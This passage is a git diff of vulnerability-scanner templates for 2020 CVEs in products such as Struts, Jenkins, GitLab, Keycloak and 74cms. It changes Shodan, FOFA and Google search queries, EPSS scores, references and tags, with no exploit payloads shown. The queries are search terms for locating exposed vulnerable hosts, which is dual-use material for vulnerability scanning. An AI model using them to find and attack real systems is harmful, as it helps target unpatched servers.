fofa-query: + - Apache Airflow + - apache airflow + - title="airflow - dags" || http.html:"apache airflow" + - title="sign in - airflow" + google-query: + - intitle:"sign in - airflow" + - intitle:"airflow - dags" || http.html:"apache airflow" tags: cve,cve2020,apache,airflow,auth-bypass http: diff --git a/http/cves/2020/CVE-2020-17530.yaml b/http/cves/2020/CVE-2020-17530.yaml index 68a849e4e7..ffed4c673d 100644 --- a/http/cves/2020/CVE-2020-17530.yaml +++ b/http/cves/2020/CVE-2020-17530.yaml @@ -27,8 +27,14 @@ info: max-request: 1 vendor: apache product: struts - shodan-query: http.html:"apache struts" - fofa-query: body="struts problem report" + shodan-query: + - http.html:"apache struts" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" google-query: intitle:"struts2 showcase" tags: cve,cve2020,apache,rce,struts,kev,packetstorm diff --git a/http/cves/2020/CVE-2020-19282.yaml b/http/cves/2020/CVE-2020-19282.yaml index af67953d7e..581b28113e 100644 --- a/http/cves/2020/CVE-2020-19282.yaml +++ b/http/cves/2020/CVE-2020-19282.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-19282 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.47808 + epss-percentile: 0.48691 cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-19295.yaml b/http/cves/2020/CVE-2020-19295.yaml index aa2c08d7bf..b230334678 100644 --- a/http/cves/2020/CVE-2020-19295.yaml +++ b/http/cves/2020/CVE-2020-19295.yaml @@ -20,13 +20,15 @@ info: cve-id: CVE-2020-19295 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.44405 + epss-percentile: 0.45236 cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: jeesns product: jeesns - fofa-query: title="Jeesns" + fofa-query: + - title="Jeesns" + - title="jeesns" tags: cve,cve2020,jeesns,xss http: diff --git a/http/cves/2020/CVE-2020-1943.yaml b/http/cves/2020/CVE-2020-1943.yaml index 0adb06cb83..587a2e9d98 100644 --- a/http/cves/2020/CVE-2020-1943.yaml +++ b/http/cves/2020/CVE-2020-1943.yaml @@ -27,8 +27,12 @@ info: max-request: 1 vendor: apache product: ofbiz - fofa-query: body="ofbiz" - shodan-query: http.html:"ofbiz" + shodan-query: + - http.html:"ofbiz" + - ofbiz.visitor= + fofa-query: + - body="ofbiz" + - app="apache_ofbiz" tags: cve2020,cve,apache,xss,ofbiz http: diff --git a/http/cves/2020/CVE-2020-20300.yaml b/http/cves/2020/CVE-2020-20300.yaml index da7ff94265..b9d233d9a5 100644 --- a/http/cves/2020/CVE-2020-20300.yaml +++ b/http/cves/2020/CVE-2020-20300.yaml @@ -20,16 +20,21 @@ info: cvss-score: 9.8 cve-id: CVE-2020-20300 cwe-id: CWE-89 - epss-score: 0.20647 - epss-percentile: 0.96263 + epss-score: 0.17677 + epss-percentile: 0.96134 cpe: cpe:2.3:a:weiphp:weiphp:5.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: weiphp product: weiphp - shodan-query: http.html:"WeiPHP5.0" - fofa-query: body="weiphp" + shodan-query: + - http.html:"WeiPHP5.0" + - http.html:"weiphp" + - http.html:"weiphp5.0" + fofa-query: + - body="weiphp" + - body="weiphp5.0" tags: cve,cve2020,weiphp,sql,sqli http: diff --git a/http/cves/2020/CVE-2020-2036.yaml b/http/cves/2020/CVE-2020-2036.yaml index 93562827b0..ef340cdee3 100644 --- a/http/cves/2020/CVE-2020-2036.yaml +++ b/http/cves/2020/CVE-2020-2036.yaml @@ -28,8 +28,10 @@ info: max-request: 3 vendor: paloaltonetworks product: pan-os + shodan-query: + - http.favicon.hash:"-631559155" + - cpe:"cpe:2.3:o:paloaltonetworks:pan-os" fofa-query: icon_hash="-631559155" - shodan-query: http.favicon.hash:"-631559155" tags: cve2020,cve,vpn,xss,paloaltonetworks http: diff --git a/http/cves/2020/CVE-2020-2096.yaml b/http/cves/2020/CVE-2020-2096.yaml index e6a7925479..06706fef71 100644 --- a/http/cves/2020/CVE-2020-2096.yaml +++ b/http/cves/2020/CVE-2020-2096.yaml @@ -28,7 +28,9 @@ info: vendor: jenkins product: gitlab_hook framework: jenkins - shodan-query: http.title:"GitLab" + shodan-query: + - http.title:"GitLab" + - http.title:"gitlab" fofa-query: title="gitlab" google-query: intitle:"gitlab" tags: cve2020,cve,jenkins,xss,gitlab,plugin,packetstorm diff --git a/http/cves/2020/CVE-2020-2103.yaml b/http/cves/2020/CVE-2020-2103.yaml index 7206405571..2340a0a7a5 100644 --- a/http/cves/2020/CVE-2020-2103.yaml +++ b/http/cves/2020/CVE-2020-2103.yaml @@ -27,7 +27,10 @@ info: max-request: 2 vendor: jenkins product: jenkins - shodan-query: http.favicon.hash:81586312 + shodan-query: + - http.favicon.hash:81586312 + - cpe:"cpe:2.3:a:jenkins:jenkins" + - product:"jenkins" fofa-query: icon_hash=81586312 tags: cve,cve2020,jenkins diff --git a/http/cves/2020/CVE-2020-21224.yaml b/http/cves/2020/CVE-2020-21224.yaml index 3fe3e41431..2bcb4d3ba8 100644 --- a/http/cves/2020/CVE-2020-21224.yaml +++ b/http/cves/2020/CVE-2020-21224.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-21224 cwe-id: CWE-88 - epss-score: 0.04664 - epss-percentile: 0.92423 + epss-score: 0.05094 + epss-percentile: 0.92923 cpe: cpe:2.3:a:inspur:clusterengine:4.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-22208.yaml b/http/cves/2020/CVE-2020-22208.yaml index e1ff6900d9..6e9c6b5eb3 100644 --- a/http/cves/2020/CVE-2020-22208.yaml +++ b/http/cves/2020/CVE-2020-22208.yaml @@ -27,7 +27,9 @@ info: vendor: 74cms product: 74cms shodan-query: http.html:"74cms" - fofa-query: app="74cms" + fofa-query: + - app="74cms" + - body="74cms" tags: cve2020,cve,74cms,sqli variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-22209.yaml b/http/cves/2020/CVE-2020-22209.yaml index b01d16360b..5e27ccca95 100644 --- a/http/cves/2020/CVE-2020-22209.yaml +++ b/http/cves/2020/CVE-2020-22209.yaml @@ -29,7 +29,9 @@ info: vendor: 74cms product: 74cms shodan-query: http.html:"74cms" - fofa-query: app="74cms" + fofa-query: + - app="74cms" + - body="74cms" tags: cve,cve2020,74cms,sqli variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-22210.yaml b/http/cves/2020/CVE-2020-22210.yaml index bd4d0224a3..d37dc4ff78 100644 --- a/http/cves/2020/CVE-2020-22210.yaml +++ b/http/cves/2020/CVE-2020-22210.yaml @@ -27,7 +27,9 @@ info: vendor: 74cms product: 74cms shodan-query: http.html:"74cms" - fofa-query: app="74cms" + fofa-query: + - app="74cms" + - body="74cms" tags: cve,cve2020,74cms,sqli variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-22211.yaml b/http/cves/2020/CVE-2020-22211.yaml index b50cb137d1..6192c1df66 100644 --- a/http/cves/2020/CVE-2020-22211.yaml +++ b/http/cves/2020/CVE-2020-22211.yaml @@ -27,7 +27,9 @@ info: vendor: 74cms product: 74cms shodan-query: http.html:"74cms" - fofa-query: app="74cms" + fofa-query: + - app="74cms" + - body="74cms" tags: cve,cve2020,74cms,sqli variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-22840.yaml b/http/cves/2020/CVE-2020-22840.yaml index f49f70617d..d33e424ccd 100644 --- a/http/cves/2020/CVE-2020-22840.yaml +++ b/http/cves/2020/CVE-2020-22840.yaml @@ -14,13 +14,14 @@ info: - http://packetstormsecurity.com/files/161362/b2evolution-CMS-6.11.6-Open-Redirection.html - https://www.exploit-db.com/exploits/49554 - https://nvd.nist.gov/vuln/detail/CVE-2020-22840 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-22840 cwe-id: CWE-601 - epss-score: 0.01043 - epss-percentile: 0.82334 + epss-score: 0.01031 + epss-percentile: 0.83821 cpe: cpe:2.3:a:b2evolution:b2evolution:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-23517.yaml b/http/cves/2020/CVE-2020-23517.yaml index 96381db450..9148e674de 100644 --- a/http/cves/2020/CVE-2020-23517.yaml +++ b/http/cves/2020/CVE-2020-23517.yaml @@ -28,8 +28,12 @@ info: max-request: 2 vendor: aryanic product: high_cms - shodan-query: title:"HighMail" - fofa-query: title="HighMail" + shodan-query: + - title:"HighMail" + - http.title:"highmail" + fofa-query: + - title="HighMail" + - title="highmail" google-query: intitle:"highmail" tags: cve,cve2020,xss,cms,highmail,aryanic diff --git a/http/cves/2020/CVE-2020-24148.yaml b/http/cves/2020/CVE-2020-24148.yaml index 182530cf77..5acfb6341c 100644 --- a/http/cves/2020/CVE-2020-24148.yaml +++ b/http/cves/2020/CVE-2020-24148.yaml @@ -26,8 +26,8 @@ info: vendor: mooveagency product: import_xml_and_rss_feeds framework: wordpress - fofa-query: body="import-xml-feed" shodan-query: http.html:"import-xml-feed" + fofa-query: body="import-xml-feed" tags: cve,cve2020,wordpress,wp-plugin,ssrf,mooveagency flow: http(1) && http(2) diff --git a/http/cves/2020/CVE-2020-24701.yaml b/http/cves/2020/CVE-2020-24701.yaml index 213473fe25..6e913d1e4a 100644 --- a/http/cves/2020/CVE-2020-24701.yaml +++ b/http/cves/2020/CVE-2020-24701.yaml @@ -25,7 +25,9 @@ info: max-request: 1 vendor: open-xchange product: open-xchange_appsuite - shodan-query: html:"Appsuite" + shodan-query: + - html:"Appsuite" + - http.html:"appsuite" fofa-query: body="appsuite" tags: cve,cve2020,packetstorm,seclists,appsuite,xss,open-xchange diff --git a/http/cves/2020/CVE-2020-24902.yaml b/http/cves/2020/CVE-2020-24902.yaml index 99a4d2cb28..ae48d96c85 100644 --- a/http/cves/2020/CVE-2020-24902.yaml +++ b/http/cves/2020/CVE-2020-24902.yaml @@ -27,9 +27,13 @@ info: max-request: 1 vendor: quixplorer_project product: quixplorer - shodan-query: http.title:"My Download Server" - google-query: intitle:"My Download Server" + shodan-query: + - http.title:"My Download Server" + - http.title:"my download server" fofa-query: title="my download server" + google-query: + - intitle:"My Download Server" + - intitle:"my download server" tags: cve,cve2020,quixplorer,xss,quixplorer_project http: diff --git a/http/cves/2020/CVE-2020-24903.yaml b/http/cves/2020/CVE-2020-24903.yaml index 9292fceb45..9b60357e10 100644 --- a/http/cves/2020/CVE-2020-24903.yaml +++ b/http/cves/2020/CVE-2020-24903.yaml @@ -28,7 +28,9 @@ info: vendor: cutesoft product: cute_editor framework: asp.net - shodan-query: http.component:"ASP.NET" + shodan-query: + - http.component:"ASP.NET" + - http.component:"asp.net" tags: cve,cve2020,cuteeditor,xss,seclists,cutesoft,asp.net http: diff --git a/http/cves/2020/CVE-2020-25495.yaml b/http/cves/2020/CVE-2020-25495.yaml index 5a7a51a139..f74ebef038 100644 --- a/http/cves/2020/CVE-2020-25495.yaml +++ b/http/cves/2020/CVE-2020-25495.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2020-25495 cwe-id: CWE-79 - epss-score: 0.00176 - epss-percentile: 0.54822 + epss-score: 0.0025 + epss-percentile: 0.64924 cpe: cpe:2.3:a:xinuos:openserver:5.0.7:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-2551.yaml b/http/cves/2020/CVE-2020-2551.yaml index 23966e9388..3c7b78bb1c 100644 --- a/http/cves/2020/CVE-2020-2551.yaml +++ b/http/cves/2020/CVE-2020-2551.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: oracle product: weblogic_server - shodan-query: http.title:"oracle peoplesoft sign-in" + shodan-query: + - http.title:"oracle peoplesoft sign-in" + - product:"oracle weblogic" fofa-query: title="oracle peoplesoft sign-in" google-query: intitle:"oracle peoplesoft sign-in" tags: cve2020,cve,oracle,weblogic,rce,unauth,kev diff --git a/http/cves/2020/CVE-2020-25780.yaml b/http/cves/2020/CVE-2020-25780.yaml index 40a8c9b236..f31f78c841 100644 --- a/http/cves/2020/CVE-2020-25780.yaml +++ b/http/cves/2020/CVE-2020-25780.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-25780 cwe-id: CWE-22 - epss-score: 0.04166 - epss-percentile: 0.92003 + epss-score: 0.0562 + epss-percentile: 0.93279 cpe: cpe:2.3:a:commvault:commcell:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-25864.yaml b/http/cves/2020/CVE-2020-25864.yaml index a5a9588d28..5e2b1528a0 100644 --- a/http/cves/2020/CVE-2020-25864.yaml +++ b/http/cves/2020/CVE-2020-25864.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: hashicorp product: consul - shodan-query: http.title:"consul by hashicorp" + shodan-query: + - http.title:"consul by hashicorp" + - cpe:"cpe:2.3:a:hashicorp:consul" fofa-query: title="consul by hashicorp" google-query: intitle:"consul by hashicorp" tags: cve,cve2020,consul,xss,intrusive,hashicorp diff --git a/http/cves/2020/CVE-2020-26153.yaml b/http/cves/2020/CVE-2020-26153.yaml index 8509b89117..3b414f79a5 100644 --- a/http/cves/2020/CVE-2020-26153.yaml +++ b/http/cves/2020/CVE-2020-26153.yaml @@ -14,21 +14,22 @@ info: - https://labs.nettitude.com/blog/cve-2020-26153-event-espresso-core-cross-site-scripting/ - https://github.com/eventespresso/event-espresso-core/compare/4.10.6.p...4.10.7.p - https://nvd.nist.gov/vuln/detail/CVE-2020-26153 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-26153 cwe-id: CWE-79 - epss-score: 0.00127 - epss-percentile: 0.47114 + epss-score: 0.00141 + epss-percentile: 0.4979 cpe: cpe:2.3:a:eventespresso:event_espresso:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: eventespresso - product: event_espresso + product: "event_espresso" framework: wordpress tags: cve2020,cve,xss,wordpress,wp-plugin,eventespresso - flow: http(1) && http(2) http: diff --git a/http/cves/2020/CVE-2020-26258.yaml b/http/cves/2020/CVE-2020-26258.yaml index ed2f7f7df1..eb7209e6aa 100644 --- a/http/cves/2020/CVE-2020-26258.yaml +++ b/http/cves/2020/CVE-2020-26258.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-26258 cwe-id: CWE-918 epss-score: 0.90088 - epss-percentile: 0.98718 + epss-percentile: 0.98778 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-26413.yaml b/http/cves/2020/CVE-2020-26413.yaml index ed03d23a82..6c2a2dc8c5 100644 --- a/http/cves/2020/CVE-2020-26413.yaml +++ b/http/cves/2020/CVE-2020-26413.yaml @@ -27,7 +27,10 @@ info: max-request: 1 vendor: gitlab product: gitlab - shodan-query: http.title:"GitLab" + shodan-query: + - http.title:"GitLab" + - cpe:"cpe:2.3:a:gitlab:gitlab" + - http.title:"gitlab" fofa-query: title="gitlab" google-query: intitle:"gitlab" tags: cve,cve2020,hackerone,gitlab,exposure,enum,graphql diff --git a/http/cves/2020/CVE-2020-2733.yaml b/http/cves/2020/CVE-2020-2733.yaml index d56d379e32..8766c1a98d 100644 --- a/http/cves/2020/CVE-2020-2733.yaml +++ b/http/cves/2020/CVE-2020-2733.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: oracle product: jd_edwards_enterpriseone_tools - shodan-query: port:8999 product:"Oracle WebLogic Server" + shodan-query: + - port:8999 product:"Oracle WebLogic Server" + - port:8999 product:"oracle weblogic server" tags: cve2020,cve,oracle,weblogic,disclosure,exposure http: diff --git a/http/cves/2020/CVE-2020-27467.yaml b/http/cves/2020/CVE-2020-27467.yaml index ee8a0d7b4c..2da53f49ae 100644 --- a/http/cves/2020/CVE-2020-27467.yaml +++ b/http/cves/2020/CVE-2020-27467.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-27467 cwe-id: CWE-22 - epss-score: 0.01056 - epss-percentile: 0.83739 + epss-score: 0.00856 + epss-percentile: 0.82223 cpe: cpe:2.3:a:processwire:processwire:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-27838.yaml b/http/cves/2020/CVE-2020-27838.yaml index 2e5af92475..2862c465a9 100644 --- a/http/cves/2020/CVE-2020-27838.yaml +++ b/http/cves/2020/CVE-2020-27838.yaml @@ -27,10 +27,17 @@ info: max-request: 1 vendor: redhat product: keycloak - shodan-query: "title:\"keycloak\"" - fofa-query: title="keycloak" + shodan-query: + - "title:\"keycloak\"" + - http.title:"keycloak" + - http.html:"keycloak" + - http.favicon.hash:-1105083093 + fofa-query: + - title="keycloak" + - icon_hash=-1105083093 + - body="keycloak" google-query: intitle:"keycloak" - tags: cve,cve2020,keycloak,exposure + tags: cve,cve2020,keycloak,exposure,redhat http: - method: GET diff --git a/http/cves/2020/CVE-2020-27982.yaml b/http/cves/2020/CVE-2020-27982.yaml index 956b55feb9..a39b13659a 100644 --- a/http/cves/2020/CVE-2020-27982.yaml +++ b/http/cves/2020/CVE-2020-27982.yaml @@ -27,9 +27,18 @@ info: max-request: 1 vendor: icewarp product: mail_server - shodan-query: title:"icewarp" - fofa-query: title="icewarp server administration" - google-query: intitle:"icewarp server administration" + shodan-query: + - title:"icewarp" + - http.title:"icewarp server administration" + - http.title:"icewarp" + - cpe:"cpe:2.3:a:icewarp:mail_server" + fofa-query: + - title="icewarp server administration" + - title="icewarp" + google-query: + - intitle:"icewarp server administration" + - intitle:"icewarp" + - powered by icewarp 10.4.4 tags: cve,cve2020,xss,icewarp,packetstorm http: diff --git a/http/cves/2020/CVE-2020-28185.yaml b/http/cves/2020/CVE-2020-28185.yaml index 84fc04f8c8..4d4e2b0112 100644 --- a/http/cves/2020/CVE-2020-28185.yaml +++ b/http/cves/2020/CVE-2020-28185.yaml @@ -28,7 +28,9 @@ info: max-request: 2 vendor: terra-master product: tos - fofa-query: '"TerraMaster" && header="TOS"' + fofa-query: + - '"TerraMaster" && header="TOS"' + - '"terramaster" && header="tos"' tags: cve2020,cve,terramaster,enum,tos,terra-master http: diff --git a/http/cves/2020/CVE-2020-28351.yaml b/http/cves/2020/CVE-2020-28351.yaml index 4fbdc41294..1aa44b0b12 100644 --- a/http/cves/2020/CVE-2020-28351.yaml +++ b/http/cves/2020/CVE-2020-28351.yaml @@ -20,13 +20,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-28351 cwe-id: CWE-79 - epss-score: 0.0036 - epss-percentile: 0.71646 - cpe: cpe:2.3:o:mitel:shoretel_firmware:19.46.1802.0:*:*:*:*:*:*:* + epss-score: 0.00359 + epss-percentile: 0.72145 + cpe: cpe:2.3:h:mitel:shoretel:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: mitel - product: shoretel_firmware + product: shoretel tags: cve,cve2020,packetstorm,shoretel,xss,mitel http: diff --git a/http/cves/2020/CVE-2020-28871.yaml b/http/cves/2020/CVE-2020-28871.yaml index 20fbd8c529..f2406610f4 100644 --- a/http/cves/2020/CVE-2020-28871.yaml +++ b/http/cves/2020/CVE-2020-28871.yaml @@ -27,9 +27,9 @@ info: max-request: 2 vendor: monitorr product: monitorr - fofa-query: icon_hash="-211006074" shodan-query: http.favicon.hash:"-211006074" - tags: cve,cve2020,unauth,fileupload,monitor,edb,intrusive,packetstorm,rce,monitorr_project + fofa-query: icon_hash="-211006074" + tags: cve,cve2020,unauth,fileupload,monitor,edb,intrusive,packetstorm,rce,monitorr_project,monitorr variables: string: "CVE-2020-28871" diff --git a/http/cves/2020/CVE-2020-28976.yaml b/http/cves/2020/CVE-2020-28976.yaml index 7585eb5de8..69269b0765 100644 --- a/http/cves/2020/CVE-2020-28976.yaml +++ b/http/cves/2020/CVE-2020-28976.yaml @@ -21,15 +21,14 @@ info: cve-id: CVE-2020-28976 cwe-id: CWE-918 epss-score: 0.00616 - epss-percentile: 0.78321 + epss-percentile: 0.78728 cpe: cpe:2.3:a:canto:canto:1.3.0:*:*:*:*:wordpress:*:* metadata: - max-request: 3 + max-request: 4 vendor: canto product: canto framework: wordpress tags: cve2020,cve,packetstorm,ssrf,wordpress,wp-plugin,oast,edb,canto - flow: http(1) && http(2) http: diff --git a/http/cves/2020/CVE-2020-29395.yaml b/http/cves/2020/CVE-2020-29395.yaml index 3434eddbcb..92fe6d1c2d 100644 --- a/http/cves/2020/CVE-2020-29395.yaml +++ b/http/cves/2020/CVE-2020-29395.yaml @@ -24,14 +24,21 @@ info: epss-percentile: 0.91992 cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: myeventon product: eventon framework: wordpress - fofa-query: wp-content/plugins/eventon/ - publicwww-query: /wp-content/plugins/eventon/ - shodan-query: http.html:/wp-content/plugins/eventon/ - google-query: inurl:"/wp-content/plugins/eventon/" + shodan-query: + - "http.html:/wp-content/plugins/eventon/" + - http.html:/wp-content/plugins/eventon-lite/ + fofa-query: + - "wp-content/plugins/eventon/" + - body=/wp-content/plugins/eventon/ + - body=/wp-content/plugins/eventon-lite/ + publicwww-query: + - "/wp-content/plugins/eventon/" + - /wp-content/plugins/eventon-lite/ + google-query: "inurl:\"/wp-content/plugins/eventon/\"" tags: cve,cve2020,wordpress,xss,wp-plugin,packetstorm,myeventon flow: http(1) && http(2) diff --git a/http/cves/2020/CVE-2020-29453.yaml b/http/cves/2020/CVE-2020-29453.yaml index 01f2f70c6f..ac3267e8d3 100644 --- a/http/cves/2020/CVE-2020-29453.yaml +++ b/http/cves/2020/CVE-2020-29453.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: atlassian product: data_center - shodan-query: http.component:"Atlassian Jira" + shodan-query: + - http.component:"Atlassian Jira" + - http.component:"atlassian jira" tags: cve,cve2020,atlassian,jira,lfi,intrusive http: diff --git a/http/cves/2020/CVE-2020-29583.yaml b/http/cves/2020/CVE-2020-29583.yaml index d8c23bb270..ee66c5cf2e 100644 --- a/http/cves/2020/CVE-2020-29583.yaml +++ b/http/cves/2020/CVE-2020-29583.yaml @@ -29,7 +29,9 @@ info: max-request: 2 vendor: zyxel product: usg20-vpn_firmware - shodan-query: title:"USG FLEX 100" + shodan-query: + - title:"USG FLEX 100" + - http.title:"usg flex 100" fofa-query: title="usg flex 100" google-query: intitle:"usg flex 100" tags: cve,cve2020,ftp-backdoor,zyxel,bypass,kev diff --git a/http/cves/2020/CVE-2020-35476.yaml b/http/cves/2020/CVE-2020-35476.yaml index 96155b7dcf..4670852c33 100644 --- a/http/cves/2020/CVE-2020-35476.yaml +++ b/http/cves/2020/CVE-2020-35476.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: opentsdb product: opentsdb - shodan-query: html:"OpenTSDB" + shodan-query: + - html:"OpenTSDB" + - http.html:"opentsdb" fofa-query: body="opentsdb" tags: cve,cve2020,opentsdb,rce,packetstorm diff --git a/http/cves/2020/CVE-2020-35729.yaml b/http/cves/2020/CVE-2020-35729.yaml index df75de7975..2a93e5b53b 100644 --- a/http/cves/2020/CVE-2020-35729.yaml +++ b/http/cves/2020/CVE-2020-35729.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35729 cwe-id: CWE-78 - epss-score: 0.95566 - epss-percentile: 0.99266 + epss-score: 0.95163 + epss-percentile: 0.99327 cpe: cpe:2.3:a:klogserver:klog_server:2.4.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35749.yaml b/http/cves/2020/CVE-2020-35749.yaml index 1145fee9cb..abb36f9cf2 100644 --- a/http/cves/2020/CVE-2020-35749.yaml +++ b/http/cves/2020/CVE-2020-35749.yaml @@ -14,13 +14,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-35749 - https://docs.google.com/document/d/1TbePkrRGsczepBaJptIdVRvfRrjiC5hjGg_Vxdesw6E/edit?usp=sharing - http://packetstormsecurity.com/files/161050/Simple-JobBoard-Authenticated-File-Read.html + - https://github.com/ezelnur6327/Enes4xd classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N cvss-score: 7.7 cve-id: CVE-2020-35749 cwe-id: CWE-22 - epss-score: 0.02144 - epss-percentile: 0.88116 + epss-score: 0.0312 + epss-percentile: 0.91079 cpe: cpe:2.3:a:presstigers:simple_board_job:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-35846.yaml b/http/cves/2020/CVE-2020-35846.yaml index 2b6dd3022a..cac2e5663a 100644 --- a/http/cves/2020/CVE-2020-35846.yaml +++ b/http/cves/2020/CVE-2020-35846.yaml @@ -27,8 +27,12 @@ info: max-request: 1 vendor: agentejo product: cockpit - shodan-query: http.favicon.hash:688609340 - fofa-query: icon_hash=688609340 + shodan-query: + - http.favicon.hash:688609340 + - http.html:"cockpit" + fofa-query: + - icon_hash=688609340 + - body="cockpit" tags: cve,cve2020,nosqli,sqli,cockpit,injection,agentejo http: diff --git a/http/cves/2020/CVE-2020-35847.yaml b/http/cves/2020/CVE-2020-35847.yaml index 99247dd76c..6f44e15296 100644 --- a/http/cves/2020/CVE-2020-35847.yaml +++ b/http/cves/2020/CVE-2020-35847.yaml @@ -29,8 +29,12 @@ info: max-request: 2 vendor: agentejo product: cockpit - shodan-query: http.favicon.hash:688609340 - fofa-query: icon_hash=688609340 + shodan-query: + - http.favicon.hash:688609340 + - http.html:"cockpit" + fofa-query: + - icon_hash=688609340 + - body="cockpit" tags: cve,cve2020,nosqli,sqli,cockpit,injection,agentejo http: diff --git a/http/cves/2020/CVE-2020-35848.yaml b/http/cves/2020/CVE-2020-35848.yaml index 1dc59dd239..9389719a65 100644 --- a/http/cves/2020/CVE-2020-35848.yaml +++ b/http/cves/2020/CVE-2020-35848.yaml @@ -27,8 +27,12 @@ info: max-request: 1 vendor: agentejo product: cockpit - shodan-query: http.favicon.hash:688609340 - fofa-query: icon_hash=688609340 + shodan-query: + - http.favicon.hash:688609340 + - http.html:"cockpit" + fofa-query: + - icon_hash=688609340 + - body="cockpit" tags: cve,cve2020,nosqli,sqli,cockpit,injection,agentejo http: diff --git a/http/cves/2020/CVE-2020-35985.yaml b/http/cves/2020/CVE-2020-35985.yaml index 5e304db73d..028198850f 100644 --- a/http/cves/2020/CVE-2020-35985.yaml +++ b/http/cves/2020/CVE-2020-35985.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-35985 cwe-id: CWE-79 epss-score: 0.00127 - epss-percentile: 0.46456 + epss-percentile: 0.47399 cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-35986.yaml b/http/cves/2020/CVE-2020-35986.yaml index 93c123a943..fd3cb4a798 100644 --- a/http/cves/2020/CVE-2020-35986.yaml +++ b/http/cves/2020/CVE-2020-35986.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-35986 cwe-id: CWE-79 epss-score: 0.00127 - epss-percentile: 0.46456 + epss-percentile: 0.47399 cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2020/CVE-2020-36289.yaml b/http/cves/2020/CVE-2020-36289.yaml index ded36677e7..dc772a86f1 100644 --- a/http/cves/2020/CVE-2020-36289.yaml +++ b/http/cves/2020/CVE-2020-36289.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: atlassian product: data_center - shodan-query: http.component:"Atlassian Jira" + shodan-query: + - http.component:"Atlassian Jira" + - http.component:"atlassian jira" tags: cve,cve2020,jira,atlassian,unauth http: diff --git a/http/cves/2020/CVE-2020-36365.yaml b/http/cves/2020/CVE-2020-36365.yaml index 5be9a529b5..4b8c026ee6 100644 --- a/http/cves/2020/CVE-2020-36365.yaml +++ b/http/cves/2020/CVE-2020-36365.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: smartstore product: smartstorenet - shodan-query: http.html:'content="Smartstore' + shodan-query: + - http.html:'content="Smartstore' + - http.html:'content="smartstore' fofa-query: body='content="smartstore' tags: cve2020,cve,redirect,smartstore diff --git a/http/cves/2020/CVE-2020-36510.yaml b/http/cves/2020/CVE-2020-36510.yaml index bc0f0e5ae6..3aa25e55f4 100644 --- a/http/cves/2020/CVE-2020-36510.yaml +++ b/http/cves/2020/CVE-2020-36510.yaml @@ -24,12 +24,11 @@ info: cpe: cpe:2.3:a:codetipi:15zine:*:*:*:*:*:wordpress:*:* metadata: verified: "false" - max-request: 1 + max-request: 2 vendor: codetipi product: 15zine framework: wordpress tags: cve2020,cve,xss,wordpress,wp-theme,wp,wpscan,codetipi - flow: http(1) && http(2) http: diff --git a/http/cves/2020/CVE-2020-5284.yaml b/http/cves/2020/CVE-2020-5284.yaml index 85a67310e5..0c629d5b75 100644 --- a/http/cves/2020/CVE-2020-5284.yaml +++ b/http/cves/2020/CVE-2020-5284.yaml @@ -26,7 +26,9 @@ info: max-request: 1 vendor: zeit product: next.js - shodan-query: http.html:"/_next/static" + shodan-query: + - 